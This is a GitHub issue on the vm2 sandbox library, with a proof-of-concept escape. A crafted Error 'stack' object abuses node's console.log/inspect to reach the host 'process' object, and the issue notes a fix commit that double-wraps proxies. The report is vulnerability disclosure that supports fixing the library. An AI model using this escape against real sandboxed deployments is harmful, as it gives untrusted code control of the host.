Breakout with console.log #241

Closed
XmiliaH opened this issue Sep 13, 2019 · 0 comments · Fixed by #242

XmiliaH commented Sep 13, 2019

Because console.log uses inspect and inspect violates the proxy specs by directly interacting with the target, it is possible to escape through console.log.

"use strict";
const {VM} = require('vm2');
// Sandboxed code: return an Error whose `stack` is not a string but an object
// shaped to pass the checks node's util.inspect performs on err.stack.
const untrusted = '(' + function(){
	const bad = new Error();
	// A null prototype sends inspect down its "constructor === null" path,
	// where it calls stack.match() with a host-realm RegExp.
	bad.__proto__ = null;
	bad.stack = {
			startsWith(){
				return true;
			},
			length: 5,
			// `outer` is the host RegExp; its constructor chain reaches the host
			// Function constructor, which is used to fetch the host `process`.
			match(outer){
				throw outer.constructor.constructor("return process")();
			}
	};
	return bad;
}+')()';
try{
	// console.log -> util.inspect strips the vm2 proxy and reads bad.stack on the raw object.
	console.log(new VM().run(untrusted));
}catch(x){
	// The thrown host `process` object arrives here, outside the sandbox.
	console.log(x);
}

Only idea I have so far is to double wrap objects from the vm in two Proxies. Inspect will remove the outer one but respect the second one.

This is new in node 12, maybe it was there in 8, but likely not in 10.

XmiliaH added a commit to XmiliaH/vm2 that referenced this issue Sep 13, 2019
Since node's inspect used by console.log strips one layer of proxies, wrap it in two.
The inner one uses a simple shared handler. Fixes patriksimek#241.
Also allow to connect a host object with a sandbox offset. This allows to override the Buffer.prototype.inspect method with a safer, in sandbox one, fixes patriksimek#187 for now, however we should have a look if other objects expose a custom inspect method.